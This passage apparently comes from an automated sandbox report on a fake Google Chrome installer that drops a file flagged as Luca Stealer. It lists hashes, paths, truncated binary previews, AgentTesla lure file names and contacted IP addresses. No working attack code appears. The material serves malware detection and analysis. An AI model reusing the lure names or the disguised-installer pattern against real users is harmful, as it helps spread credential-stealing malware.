                                                                                                      Fiyat_teklifi_Istegi_230906_PER_1000_Adet_#U2026scanneed_00101.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      Dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      E-DEKONT1,DOC.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111
                                                                                                      DHL_Express_Receipt__AWB#20448299082.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                      • 149.154.167.220
                                                                                                      • 108.181.47.111

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Config.Msi\48f6f5.rbs

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:data
                                                                                                      Category:modified
                                                                                                      Size (bytes):10560
                                                                                                      Entropy (8bit):5.698899133048646
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:qm7S7VX9PKilb9U1d2819RyA3revylaVS2RfUqBCCsvVhRfUqBCC6jNaKeMpvVyM:rGX9PKQboYmZeqMMmBkMmBwphbQLpzZQ
                                                                                                      MD5:463C283AD9BA4005A7D346C92CEEEEB0
                                                                                                      SHA1:EDBBF8D547F6EBCABD925D0CE4BB3A3756DDC4ED
                                                                                                      SHA-256:96941D328A3EBB921A9ED4A67C74F5741254ABEB6980CC989061763106D137A8
                                                                                                      SHA-512:0DB4D6D0CEC078344B62A64C41D2A3FCE4BCE37CC9B6B5DA6C009B529A7A1D005DFDEC374A51F2C425A2EE8D198BCB2450D030FF347F2EDC22702E1524288412
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:...@IXOS.@.....@C.'W.@.....@.....@.....@.....@.....@......&.{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}..Google Chrome..Google Chrome.msi.@.....@T..t.@.....@....'.MarcusRobertoGooglePlayGoogleChrome.exe..&.{7999D004-3FE0-4CD8-943E-BF9FBB0A2001}.....@.....@.....@.....@.......@.....@.....@.......@......Google Chrome......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{D70E607B-4D9A-4548-AF2E-1E1200F61D0D}&.{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}.@......&.{B04D4B4B-8EDE-4720-89FB-9A1B26123FC9}&.{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}.@......&.{DF7EBEE6-E247-47DC-A0CB-847F491D7928}&.{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}.@......&.{09799D1C-534A-4BA8-A6F1-932AA94B9DFA}&.{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}.@......&.{EA568868-C408-412A-964B-59075ED50BF3}&.{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}.@......&.{6161C65A-3BCC-49E8-BD36-7C8F210CA31D}&.{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}.@......&.{989FF44B-7EA4-

                                                                                                      C:\Program Files\Google LLC\Google Chrome\setup.exe

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4431104
                                                                                                      Entropy (8bit):6.418228612537541
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:IFvjeUOp6myhL0+h1KwSVvwN1kQjNbK0A6BiASvu+k61w+mE0QW/eKtwFJRXFk2R:Af010/TjDQWv0D1Jt4EiNu41
                                                                                                      MD5:BBB9D1514179EFCC7E990CE9367EC2C3
                                                                                                      SHA1:5060716EE62ED66D15A7BB09FA53D69FA891604A
                                                                                                      SHA-256:D09678514FFA011AF1DE8FC195AAA83EC70F646BB6712E5C324522DA6A6C3042
                                                                                                      SHA-512:A00D8CED50E5D819E580E128AA5B34CE03A4B630040304800CEA4A395918F20B36DFC8D8FD6C607BBEC705628D16DF16E86CBC60C2651EF2162B004FC9459FBD
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: JoeSecurity_LucaStealer, Description: Yara detected Luca Stealer, Source: C:\Program Files\Google LLC\Google Chrome\setup.exe, Author: Joe Security
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 22%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............^...^...^...^...^+.._...^+.._...^+.._...^K.._...^\.._...^...^...^..._...^...^...^..._...^Rich...^........................PE..d....v.d.........."....$.N/..<.......~.........@..............................C.......C...`..................................................xA...............B.......C......@C..u...@.......................@.(.....@.@............`/..............................text...pM/......N/................. ..`.rdata...9...`/..:...R/.............@..@.data....n....A..b....A.............@....pdata........B.......A.............@..@_RDATA..\....0C.......C.............@..@.reloc...u...@C..v....C.............@..B................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\Caphyon\Advanced Installer\{C0E9F3B5-1040-4A45-ACBB-0C1165F58D53}\Google Chrome.exe

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):3507760
                                                                                                      Entropy (8bit):6.436827118405991
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:49152:FWtfl3xiDZjSPQaLOpU0dpBYYZFfsqWGXwuO6Bpp5UhXYpnF4tk11zppI04zmHZG:Ytfl0kYax0dMiNsqWGXwtyIhB
                                                                                                      MD5:0BCDF1665433A2FE6C24CAB49AAB35F9
                                                                                                      SHA1:43BEA783B62F5D21934CE839CA401E9DED4A7BAC
                                                                                                      SHA-256:CACE945D7342B3A4F64B90728217E5E7030AFA8EBD292C0F77860E2CDE7886D0
                                                                                                      SHA-512:4E75CCFA0E7E3DA77979274CA5364296269334D19DB013C16D53508196043288690563680B12BFDE4902D1A14ED70B1C89351F7653127B3F9ECE8C34BBFD7D55
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 11%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........."2..La..La..La".O`..La".I`J.La".J`..LaU.H`..LaU.O`..LaU.I`..La".H`..La".M`..La".K`..La..Ma..La.E`..La.a..La...a..La.N`..LaRich..La........PE..L....9.d.........."....$..&.........b.........&...@..........................06.......5...@.................................T./.(.....0.............8i5.......3.......).p...................@.).....`.&.@.............&......w/......................text.....&.......&................. ..`.rdata..Z.....&.......&.............@..@.data...@...../..<..../.............@....rsrc.........0......./.............@..@.reloc........3.......2.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\setup.lnk

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Sun Aug 27 16:15:04 2023, mtime=Thu Sep 7 13:42:06 2023, atime=Sun Aug 27 16:15:04 2023, length=4431104, window=hide
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1147
                                                                                                      Entropy (8bit):4.534672454423805
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:8m1PRkdjhg0SYWAadp+o+0zBxdp+o+0bJHHAHKyfm:8m1PSdjhgyNadAR6HdARqIx
                                                                                                      MD5:A9C61DA64CD6752FCE86B80A241B08B1
                                                                                                      SHA1:9369A59DE178233D272691DA871DC5BD2D3EA317
                                                                                                      SHA-256:08B0184AC244239E9E6736D17D796D6A689F26C8BB2C40E833E16ED8874705AE
                                                                                                      SHA-512:9985D6223842E50FADEFCD83DC7AE970E0371E251B2EA76CE59F60686DE6C0EB39E0BB9A884A029F37AA014E760AC20CB212ECF3F0EEA4BFFCADAFA9591B06FB
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:L..................F.... ...........Yq.x..............C..........................P.O. .:i.....+00.../C:\.....................1.....'WCu..PROGRA~1..t......L.'WCu....E...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....^.1.....'WCu..GOOGLE~1..F......'WCu'WCu..............................G.o.o.g.l.e. .L.L.C.....d.1.....'WCu..GOOGLE~1..L......'WCu'WCu..............................G.o.o.g.l.e. .C.h.r.o.m.e.....\.2...C..W. .setup.exe.D.......W.'WDu..............................s.e.t.u.p...e.x.e.......b...............-.......a............zS......C:\Program Files\Google LLC\Google Chrome\setup.exe..B.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e. .L.L.C.\.G.o.o.g.l.e. .C.h.r.o.m.e.\.s.e.t.u.p...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e. .L.L.C.\.G.o.o.g.l.e. .C.h.r.o.m.e.\.........&................c^...NI..e.2.......`.......X.......468325...........!a..%.H.VZAj...+..s8...........!a..%.H.VZAj...+..s8.

                                                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):330
                                                                                                      Entropy (8bit):3.4168830506411676
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:kK68Z6YA0N+SkQlPlEGYRMY9z+4KlDA3RUeoMmlb:iYWrkPlE99SNxAhUeor
                                                                                                      MD5:B3E2E668F4E8854201F6A56538C66F89
                                                                                                      SHA1:09C04E4154071CA7A5CFF71B60C127803D8DDB01
                                                                                                      SHA-256:58895B6294CEBA9B4D780B12DBC77CF8F0CEF907DA74C61FA20A83C56DE2D151
                                                                                                      SHA-512:725D4CA7FDDCC39F73C0BE212C22330A8623B9A5E23810A9E371856194E934A4279352FE74105C50C04A7DA6EE5308A35F6DFBFBB61B69A3681752BB0FA24246
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:p...... ........Bk.h....(...............................................;.._.... ........?:.".......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".6.0.6.7.8.6.d.1.2.2.d.5.d.9.1.:.0."...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1292
                                                                                                      Entropy (8bit):5.359854452502114
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:3+PpQdo4KAxX5qRP6hTppohUqKHZL9tCHKJRSF8PQ9azn:uPei4nqRSXuWq+L9tCHaR48Y9az
                                                                                                      MD5:0A1DCF5E1ADC55A423403E778AC291C4
                                                                                                      SHA1:D2FBAD270C79BE3D729DDD515AC4D0DC01A2CEFE
                                                                                                      SHA-256:57C44363AD18018D9047957F184FC34E7CE9AB168266759EF326DCC77A0FFBC5
                                                                                                      SHA-512:22BD2C6218693417B3DC15DE326738BFFD0F3012130E381A1C797E5385AF7012E2992A06C9F8FEB990376DB617AB7DA3D13B334EE3925D39A8A113072ED8348D
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:@...e................................................@..........8....................@.Z:.h...........System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0................UW...F.}*.A..x........System..4...............A{....L..-............System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<.....................N...>m..>........System.Management...@...............$TRE..&D.#.t.c%A........System.DirectoryServices4................ .v'#-N....M..d........System.Xml..4...............A.....A....'.b.........System.Data.<.................hr..B.....w.O........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<..................ASG...M-.?.........System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D.....................G..H.).7.........System.Configuration.Ins

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\ExternalUICleaner.dll

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):195392
                                                                                                      Entropy (8bit):6.6948611787144
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:uYioJUAoM8hWgOme/Nxe4mPS0TUTn0QOInIXcVjjjjOAg0FuDuoFE5Yc/WnSD1+:bsOJePGn0QfQAOk5d+nSB
                                                                                                      MD5:0EAC3A39681989C8CF86351D28CE5A77
                                                                                                      SHA1:510CC35F1B38DA02D2CD6B5F4808944712DE2275
                                                                                                      SHA-256:4DD265237ADD8E8A7CC51B83C0F024356A40C0BAD16C5FDDA097911C1FBEF87C
                                                                                                      SHA-512:55BF0457C4E6DEB1AA699162B44899F243C214F37B4F26D791269A6D8097ED22AEE63ABD9F8C69C7A57237545D6A31C9F25903B69FB001306C935063BBC086F3
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Reputation:unknown
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.f.p...p...p......}.............f......a......g...... ......a...p......i...e...i...q...i...q...p..q...i...q...Richp...........................PE..L...U=.d.........."!...$...........................................................=.....@.....................................x.......................@=..........0|..p....................|......p{..@............................................text...?........................... ..`.rdata..............................@..@.data...d...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\GSBT.xaml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):658
                                                                                                      Entropy (8bit):4.955134837800606
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:kr4+DJKw+DJiW8+DpnMEfWKvAaeyAJc3p4co9YmHIc3p4Qwit9YmFOO:o4+4w+a+hDfZxLZkZpZKitp
                                                                                                      MD5:B54019A3DF146BD0053E84F4DDC9DD60
                                                                                                      SHA1:625278D53D6C8999D7D127B9CD06CF5D812BC491
                                                                                                      SHA-256:D7147D031E051CFE9D42C3F8B3E3D2963EB7F8046430331E737F8B60B8E4B293
                                                                                                      SHA-512:B2B051B389B851A710E097D462CD28755B836573D50215A0D13F5A9F77C7CCDAEBCB6DFB5B92907ACB70D706AFFAEB357E302A8574E31FDAC356B42E206789D5
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:<SplitButton xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation".. xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml".. xmlns:d="http://schemas.microsoft.com/expression/blend/2008".. xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006".. Content="Split">...<SplitButton.Resources>....<SolidColorBrush x:Key="SplitButtonBackground".... Color="{ThemeResource SystemAccentColorLight1}"/>....<SolidColorBrush x:Key="SplitButtonBackgroundPointerOver".... Color="{ThemeResource SystemAccentColorLight2}"/>...</SplitButton.Resources>..</SplitButton>

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\ImageCheckBox.xaml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):292
                                                                                                      Entropy (8bit):4.861580373550762
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6:8IymUA+DO0KtkFRUA+DO0iERziUA+Dp/PHWwUifWKvAn+B:Py4+DJKM+DJik8+Dpn2EfWKvAe
                                                                                                      MD5:D8183F12C5CAF9008EB9424C49F99F5A
                                                                                                      SHA1:66B70B93DF0E01F14F243CAEE63E648DC7D0AD1D
                                                                                                      SHA-256:4C1E97804F92610C2EA98A2DD6E5D8E2E0F205415B779A3B8051542B0AAC3072
                                                                                                      SHA-512:675F92FC03834599DD13113BF8A4F8099CAB8BB34EF1C12F36886AB82D69E6B5EC564D6A5EC1F134B8589328F786F2B4633B90FDAF2704B03BC0357B94E2BFB8
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:<CheckBox.. xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation".. xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml".. xmlns:d="http://schemas.microsoft.com/expression/blend/2008".. xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">....</CheckBox>..

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\ProgressImage.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 172 x 2, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1869
                                                                                                      Entropy (8bit):5.813402326168254
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Gzo7FDvnqknA9W2zgYrh/cHJ3xw3XttHK39H0Gw:co7FbqknmWNYrh/yittHgH0Gw
                                                                                                      MD5:8C903C7A534CD12C8EEA9582068FB39D
                                                                                                      SHA1:ED049DCEBC99857FA90043861C5619C776F8E937
                                                                                                      SHA-256:EFDF35F6BE917E4CBB41482226F2B475537F1D3DE9D415933ED499A89342EAE1
                                                                                                      SHA-512:BAF4487948277BB04392B81F2AC211B96F6ADC37545A3DDF60DF50721329B6D967BFD85EB9048C1C343094D37350F90F988FCA3BA587F31B3E96734B9FF05A4C
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR..............'7F....sRGB.........gAMA......a.....pHYs...%...%.IR$.....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmpMM:OriginalDocumentID="xmp.did:DC74BB36F13411E7B9DAF69239A47EE0" xmpMM:DocumentID="xmp.did:177E35F1F47511E7851197F734C157FA" xmpMM:InstanceID="xmp.iid:64d94472-a5cf-3e42-a150-242af63002d7" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmp:CreateDate="2018-01-08T14:03:54+02:00" xmp:ModifyDate="2018-02-26T12:22:17+0

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\aboutbtn

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 144 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1632
                                                                                                      Entropy (8bit):7.065194573254018
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t1hGHWwh82lYSKwqWT7TpVTWvT3T0yJ3VnWgGvsGTC4XchCOMOsPdPwiql23lVc:TJvnLjqvp1WvnJ3Ig12MhCZRjPc
                                                                                                      MD5:B51B54B77E9CBFDB1063F7487C1C07EC
                                                                                                      SHA1:8A8A7036CFBC86A537447BF71B9F6795923DB8B9
                                                                                                      SHA-256:9D7243C688264329A8CB9E22DA00B651E0A9407741D722E03DD67CC8B3EE1335
                                                                                                      SHA-512:04CEF1AA3A530E7F03054369450EB42F36BF45C13C7445ADF450EC4635A8601447C5BB6E978B3ADABE9021019644681BF1609539EB548DD50ADA973AAC0C6555
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR...............t.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:d1e63b55-9116-0245-817e-e9b4ed3c6432" xmpMM:DocumentID="xmp.did:485C39C1C94F11ED83288002166ECD5D" xmpMM:InstanceID="xmp.iid:485C39C0C94F11ED83288002166ECD5D" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:aedb8564-e1ec-6e45-936a-37a934478847" stRef:documentID="adobe:docid:photoshop:eaad788d-11ce-b144-80d2-31699d954fc0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.~.l...rIDATx...KTQ..

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\aboutbtn.xaml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):791
                                                                                                      Entropy (8bit):5.226686182904195
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:74+DJKM+DJik8+Dpn2EfWKvAxAuEAZ/Xpl3vuAIc3+kvl3Qw9YuAIc3Fw9YH08y:74+4M+i+hxfi/9pua19Y9py9YC
                                                                                                      MD5:EA680496AD3D80DC404138CB24187D8B
                                                                                                      SHA1:782913444374E5A2844165E5F6B47BD67EBAFC3C
                                                                                                      SHA-256:E95D463716EFA3B37FBF909E6B87B8F6CCE2B5E38839B5405A817E97FB48E15D
                                                                                                      SHA-512:4414279D39FA1A59FBF088C8C65DB7A048F1245BD9A7EB68EA585341A009B65B652FF81C66166B2F56FED3369D60070800964F532C658B88CD4A93B817C188CC
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:<Button.. xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation".. xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml".. xmlns:d="http://schemas.microsoft.com/expression/blend/2008".. xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006".. mc:Ignorable="d" Foreground="#4f76b7" Background="#f3f3f3" Padding="0.5" BorderThickness="0">.. <Button.Resources>.. <SolidColorBrush x:Key="ButtonForegroundPressed" Color="#4f76b7"/>....<SolidColorBrush x:Key="ButtonBackgroundPressed" Color="#ededed"/>....... <SolidColorBrush x:Key="ButtonForegroundPointerOver" Color="#4f76b7"/>....<SolidColorBrush x:Key="ButtonBackgroundPointerOver" Color="#eaeaea"/>.. </Button.Resources>.. <FontIcon FontSize="22" Glyph="&#xE946;" />..</Button>..

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\aboutbtndark

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 144 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1632
                                                                                                      Entropy (8bit):7.065194573254018
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:t1hGHWwh82lYSKwqWT7TpVTWvT3T0yJ3VnWgGvsGTC4XchCOMOsPdPwiql23lVc:TJvnLjqvp1WvnJ3Ig12MhCZRjPc
                                                                                                      MD5:B51B54B77E9CBFDB1063F7487C1C07EC
                                                                                                      SHA1:8A8A7036CFBC86A537447BF71B9F6795923DB8B9
                                                                                                      SHA-256:9D7243C688264329A8CB9E22DA00B651E0A9407741D722E03DD67CC8B3EE1335
                                                                                                      SHA-512:04CEF1AA3A530E7F03054369450EB42F36BF45C13C7445ADF450EC4635A8601447C5BB6E978B3ADABE9021019644681BF1609539EB548DD50ADA973AAC0C6555
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:.PNG........IHDR...............t.....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:d1e63b55-9116-0245-817e-e9b4ed3c6432" xmpMM:DocumentID="xmp.did:485C39C1C94F11ED83288002166ECD5D" xmpMM:InstanceID="xmp.iid:485C39C0C94F11ED83288002166ECD5D" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:aedb8564-e1ec-6e45-936a-37a934478847" stRef:documentID="adobe:docid:photoshop:eaad788d-11ce-b144-80d2-31699d954fc0"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.~.l...rIDATx...KTQ..

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\aboutbtndark.xaml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):791
                                                                                                      Entropy (8bit):5.238552257328604
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:74+DJKM+DJik8+Dpn2EfWKvAxADkAZ/Xpl3vuAIc3+bXpoZl3Qw9YuAIc3Fw9YKN:74+4M+i+hxfrF/9puzpoL19Y9py9YKN
                                                                                                      MD5:70A671452ED9D4BFFCD83E0B486338B9
                                                                                                      SHA1:5224BC067A1882D913A18DEAD1AF1BAE2BEDB1E8
                                                                                                      SHA-256:742B0F642B590F60B41F764673462CD4D9637E1BDE5CCDE41B380F1009D99175
                                                                                                      SHA-512:D5B9E4573A8202BCF293B10F734E98CB3A44B7C9B276F1DC54B187C12C10CB4204213AB41ADFFB3FD575C9AF8EB201342B4490F9AF085B99D24BD9C74E0E0E16
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
                                                                                                      Preview:<Button.. xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation".. xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml".. xmlns:d="http://schemas.microsoft.com/expression/blend/2008".. xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006".. mc:Ignorable="d" Foreground="#4f76b7" Background="#202020" Padding="0.5" BorderThickness="0">.. <Button.Resources>.. <SolidColorBrush x:Key="ButtonForegroundPressed" Color="#4f76b7"/>....<SolidColorBrush x:Key="ButtonBackgroundPressed" Color="#292929"/>....... <SolidColorBrush x:Key="ButtonForegroundPointerOver" Color="#4f76b7"/>....<SolidColorBrush x:Key="ButtonBackgroundPointerOver" Color="#2d2d2d"/>.. </Button.Resources>.. <FontIcon FontSize="22" Glyph="&#xE946;" />..</Button>..

                                                                                                      C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6524\applogo.png

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\bb.exe
                                                                                                      File Type:PNG image data, 93 x 93, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2597
                                                                                                      Entropy (8bit):7.884507754587438
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:VCtgC1Ltv3RZCZNDdupj4Xq0EtyH8/B7F9bCStKnM285hX3K:Vl03RZCZNxupj4XqfzB7WSQM95hq
                                                                                                      MD5:361DE7C5255960A713752D4CB2AFFB22
                                                                                                      SHA1:B13D61F1A7FBC4E3652EA5BA13CAC2381EB245DB
                                                                                                      SHA-256:6F70529679C617DE0B9305DE18F9DB87AC020B6F5308176320F704C7ECB50EE6
                                                                                                      SHA-512:A65581E9675B6B54D53B227BC548CAE2D8D3444FF0E3C73ED9A4D54F9D6E29B83BA7D34DE616A6B3BD76AFBCFA9515E869ACF6DFB60C2B5EF96FEDEC099150AF
                                                                                                      Malicious:false
                                                                                                      Reputation:unknown
